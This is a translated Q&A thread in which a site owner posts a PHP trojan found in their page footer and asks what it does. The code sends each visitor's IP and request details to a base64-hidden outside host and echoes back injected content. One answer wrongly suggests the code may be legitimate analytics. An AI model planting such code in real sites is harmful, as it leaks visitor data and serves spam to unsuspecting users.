嵌入我网站页面的特洛伊木马代码。这段代码是什么意思?

时间:2013-05-06 03:05:18

标签: php

今天当我打开我的网站时,ESET NOD32警告我一个木马并阻止了网站。 当我分析代码时,下面的代码在页脚中......这个代码是什么,以及通过将此代码插入我的网站可以获得(黑客)的优势?

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

2 个答案:

答案 0 :(得分:4)

对我来说,它看起来像某种分析代码。它会将请求的URL,远程IP地址,浏览器用户代理等详细信息发送到“http://mbrowserstats.com/statH/stat.php”。我不熟悉那个特定的网站,但它可能是合法的。有时,防病毒软件会错误地报告这些内容。

基于一些搜索,它似乎有点50/50。它似乎没有造成巨大的伤害,但可能会被黑客攻击。我找到的一些示例页面:

删除它可能最安全,并遵循一些防止再次发生的建议。

答案 1 :(得分:1)

这看起来不合法。 search for one of the strings in the code显示其可能的目的是仅在选择的搜索引擎访问时添加指向您网站的链接。

因此,当你去网站本身时看起来会很好,但它会为搜索引擎充满垃圾邮件类型的广告,反过来又会看到你的网站支持各种旨在提升的链接他们的网页排名。

在任何情况下,如果您没有专门识别代码,请保护您的用户安全并摆脱它。如果你没有安装它,你应该弄清楚代码是如何安装的,所以它不会再发生。